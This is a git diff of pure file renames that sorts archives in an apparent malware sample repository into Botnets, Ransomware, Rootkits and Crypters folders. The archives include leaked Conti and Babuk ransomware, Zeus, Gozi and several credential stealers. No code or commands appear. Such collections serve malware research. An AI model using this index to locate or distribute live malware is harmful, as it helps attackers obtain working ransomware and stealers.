a/Win32/Win32.WoopieBot.7z b/Win32/Botnets/Win32.WoopieBot.7z similarity index 100% rename from Win32/Win32.WoopieBot.7z rename to Win32/Botnets/Win32.WoopieBot.7z diff --git a/Win32/Win32.XBot.7z b/Win32/Botnets/Win32.XBot.7z similarity index 100% rename from Win32/Win32.XBot.7z rename to Win32/Botnets/Win32.XBot.7z diff --git a/Win32/Win32.XFireSpread.7z b/Win32/Botnets/Win32.XFireSpread.7z similarity index 100% rename from Win32/Win32.XFireSpread.7z rename to Win32/Botnets/Win32.XFireSpread.7z diff --git a/Win32/Win32.Xinch.rar b/Win32/Botnets/Win32.Xinch.rar similarity index 100% rename from Win32/Win32.Xinch.rar rename to Win32/Botnets/Win32.Xinch.rar diff --git a/Win32/Win32.Xtcp.ba.7z b/Win32/Botnets/Win32.Xtcp.ba.7z similarity index 100% rename from Win32/Win32.Xtcp.ba.7z rename to Win32/Botnets/Win32.Xtcp.ba.7z diff --git a/Win32/Win32.Ya.7z b/Win32/Botnets/Win32.Ya.7z similarity index 100% rename from Win32/Win32.Ya.7z rename to Win32/Botnets/Win32.Ya.7z diff --git a/Win32/Win32.Zemra.7z b/Win32/Botnets/Win32.Zemra.7z similarity index 100% rename from Win32/Win32.Zemra.7z rename to Win32/Botnets/Win32.Zemra.7z diff --git a/Win32/Win32.Zero.7z b/Win32/Botnets/Win32.Zero.7z similarity index 100% rename from Win32/Win32.Zero.7z rename to Win32/Botnets/Win32.Zero.7z diff --git a/Win32/Win32.h3xb0t.rar b/Win32/Botnets/Win32.h3xb0t.rar similarity index 100% rename from Win32/Win32.h3xb0t.rar rename to Win32/Botnets/Win32.h3xb0t.rar diff --git a/Win32/Win32.x0rUsb.7z b/Win32/Botnets/Win32.x0rUsb.7z similarity index 100% rename from Win32/Win32.x0rUsb.7z rename to Win32/Botnets/Win32.x0rUsb.7z diff --git a/Win32/Win32.PureCrypt.rar b/Win32/Crypters/Win32.PureCrypt.rar similarity index 100% rename from Win32/Win32.PureCrypt.rar rename to Win32/Crypters/Win32.PureCrypt.rar diff --git a/Win32/Hoax.Win32.Ransomware.Petya.zip b/Win32/Ransomware/Hoax.Win32.Ransomware.Petya.zip similarity index 100% rename from Win32/Hoax.Win32.Ransomware.Petya.zip rename to Win32/Ransomware/Hoax.Win32.Ransomware.Petya.zip diff --git a/Leaks/Other/Ransomware.Multi.Babuk.c.rar b/Win32/Ransomware/Ransomware.Multi.Babuk.c.rar similarity index 100% rename from Leaks/Other/Ransomware.Multi.Babuk.c.rar rename to Win32/Ransomware/Ransomware.Multi.Babuk.c.rar diff --git a/Win32/Win32.BAT.GonnaCope.7z b/Win32/Ransomware/Win32.BAT.GonnaCope.7z similarity index 100% rename from Win32/Win32.BAT.GonnaCope.7z rename to Win32/Ransomware/Win32.BAT.GonnaCope.7z diff --git a/Leaks/Win32/Win32.Conti.c.7z b/Win32/Ransomware/Win32.Conti.c.7z similarity index 100% rename from Leaks/Win32/Win32.Conti.c.7z rename to Win32/Ransomware/Win32.Conti.c.7z diff --git a/Win32/Win32.RansomWar.rar b/Win32/Ransomware/Win32.RansomWar.rar similarity index 100% rename from Win32/Win32.RansomWar.rar rename to Win32/Ransomware/Win32.RansomWar.rar diff --git a/Leaks/Win32/Win32.Ransomware.Paradise.a.zip b/Win32/Ransomware/Win32.Ransomware.Paradise.a.zip similarity index 100% rename from Leaks/Win32/Win32.Ransomware.Paradise.a.zip rename to Win32/Ransomware/Win32.Ransomware.Paradise.a.zip diff --git a/Win32/Win32.Ransomware.SkynetLocker.7z b/Win32/Ransomware/Win32.Ransomware.SkynetLocker.7z similarity index 100% rename from Win32/Win32.Ransomware.SkynetLocker.7z rename to Win32/Ransomware/Win32.Ransomware.SkynetLocker.7z diff --git a/Leaks/Bootkit/Bootkit.Rovnix.7z b/Win32/Rootkits/Bootkit.Rovnix.7z similarity index 100% rename from Leaks/Bootkit/Bootkit.Rovnix.7z rename to Win32/Rootkits/Bootkit.Rovnix.7z diff --git a/Win32/Win32.Rootkit.Alpha.a.c.7z b/Win32/Rootkits/Win32.Rootkit.Alpha.a.c.7z similarity index 100% rename from Win32/Win32.Rootkit.Alpha.a.c.7z rename to Win32/Rootkits/Win32.Rootkit.Alpha.a.c.7z diff --git a/Win32/Win32.Rootkit.GpuWinJelly.a.zip b/Win32/Rootkits/Win32.Rootkit.GpuWinJelly.a.zip similarity index 100% rename from Win32/Win32.Rootkit.GpuWinJelly.a.zip rename to Win32/Rootkits/Win32.Rootkit.GpuWinJelly.a.zip diff --git a/Win32/Win32.Rootkit.He4.rar b/Win32/Rootkits/Win32.Rootkit.He4.rar similarity index 100% rename from Win32/Win32.Rootkit.He4.rar rename to Win32/Rootkits/Win32.Rootkit.He4.rar diff --git a/Win32/Win32.Rootkit.Ibmis.rar b/Win32/Rootkits/Win32.Rootkit.Ibmis.rar similarity index 100% rename from Win32/Win32.Rootkit.Ibmis.rar rename to Win32/Rootkits/Win32.Rootkit.Ibmis.rar diff --git a/Win32/Win32.Rootkit.SMMRootkit.rar b/Win32/Rootkits/Win32.Rootkit.SMMRootkit.rar similarity index 100% rename from Win32/Win32.Rootkit.SMMRootkit.rar rename to Win32/Rootkits/Win32.Rootkit.SMMRootkit.rar diff --git a/Win32/Win32.Rootkit.Sock.b.7z b/Win32/Rootkits/Win32.Rootkit.Sock.b.7z similarity index 100% rename from Win32/Win32.Rootkit.Sock.b.7z rename to Win32/Rootkits/Win32.Rootkit.Sock.b.7z diff --git a/Win32/Win32.Rootkit.Zion.a.rar b/Win32/Rootkits/Win32.Rootkit.Zion.a.rar similarity index 100% rename from Win32/Win32.Rootkit.Zion.a.rar rename to Win32/Rootkits/Win32.Rootkit.Zion.a.rar diff --git a/Leaks/Other/Trojan-Banker.Win32.Dexter.7z b/Win32/Trojan-Banker.Win32.Dexter.7z similarity index 100% rename from Leaks/Other/Trojan-Banker.Win32.Dexter.7z rename to Win32/Trojan-Banker.Win32.Dexter.7z diff --git a/Leaks/Other/Unknown.DarkRadiation.7z b/Win32/Unknown.DarkRadiation.7z similarity index 100% rename from Leaks/Other/Unknown.DarkRadiation.7z rename to Win32/Unknown.DarkRadiation.7z diff --git a/Leaks/Other/Unknown.EB0LA.7z b/Win32/Unknown.EB0LA.7z similarity index 100% rename from Leaks/Other/Unknown.EB0LA.7z rename to Win32/Unknown.EB0LA.7z diff --git a/Leaks/Win32/Win32.Annabelle.J.7z b/Win32/Win32.Annabelle.J.7z similarity index 100% rename from Leaks/Win32/Win32.Annabelle.J.7z rename to Win32/Win32.Annabelle.J.7z diff --git a/Leaks/Win32/Win32.BloodyStealer.rar b/Win32/Win32.BloodyStealer.rar similarity index 100% rename from Leaks/Win32/Win32.BloodyStealer.rar rename to Win32/Win32.BloodyStealer.rar diff --git a/Leaks/Win32/Win32.Borat.7z b/Win32/Win32.Borat.7z similarity index 100% rename from Leaks/Win32/Win32.Borat.7z rename to Win32/Win32.Borat.7z diff --git a/Leaks/Win32/Win32.Buhtrap.7z b/Win32/Win32.Buhtrap.7z similarity index 100% rename from Leaks/Win32/Win32.Buhtrap.7z rename to Win32/Win32.Buhtrap.7z diff --git a/Leaks/Win32/Win32.Exonet.a.rar b/Win32/Win32.Exonet.a.rar similarity index 100% rename from Leaks/Win32/Win32.Exonet.a.rar rename to Win32/Win32.Exonet.a.rar diff --git a/Leaks/Win32/Win32.Gozi.rar b/Win32/Win32.Gozi.rar similarity index 100% rename from Leaks/Win32/Win32.Gozi.rar rename to Win32/Win32.Gozi.rar diff --git a/Leaks/Win32/Win32.HiddenVNCBot.2021.zip b/Win32/Win32.HiddenVNCBot.2021.zip similarity index 100% rename from Leaks/Win32/Win32.HiddenVNCBot.2021.zip rename to Win32/Win32.HiddenVNCBot.2021.zip diff --git a/Leaks/Other/Win32.Module.AmadeyStartup.zip b/Win32/Win32.Module.AmadeyStartup.zip similarity index 100% rename from Leaks/Other/Win32.Module.AmadeyStartup.zip rename to Win32/Win32.Module.AmadeyStartup.zip diff --git a/Leaks/Win32/Win32.PryntStealer.7z b/Win32/Win32.PryntStealer.7z similarity index 100% rename from Leaks/Win32/Win32.PryntStealer.7z rename to Win32/Win32.PryntStealer.7z diff --git a/Leaks/Win32/Win32.Stealer.PredatorTheThief.zip b/Win32/Win32.Stealer.PredatorTheThief.zip similarity index 100% rename from Leaks/Win32/Win32.Stealer.PredatorTheThief.zip rename to Win32/Win32.Stealer.PredatorTheThief.zip diff --git a/Leaks/Win32/Win32.Stealer.SoranoStealer.zip b/Win32/Win32.Stealer.SoranoStealer.zip similarity index 100% rename from Leaks/Win32/Win32.Stealer.SoranoStealer.zip rename to Win32/Win32.Stealer.SoranoStealer.zip diff --git a/Leaks/Win32/Win32.Zeus.a.b.7z b/Win32/Win32.Zeus.a.b.7z similarity index 100% rename from Leaks/Win32/Win32.Zeus.a.b.7z rename to Win32/Win32.Zeus.a.b.7z diff --git a/Leaks/Win32/Win32.Zeus.b.7z b/Win32/Win32.Zeus.b.7z similarity index 100% rename from Leaks/Win32/Win32.Zeus.b.7z rename to Win32/Win32.Zeus.b.7z diff --git a/Leaks/Win32/Win32.m0yv.7z b/Win32/Win32.m0yv.7z similarity index 100% rename from Leaks/Win32/Win32.m0yv.7z rename to Win32/Win32.m0yv.7z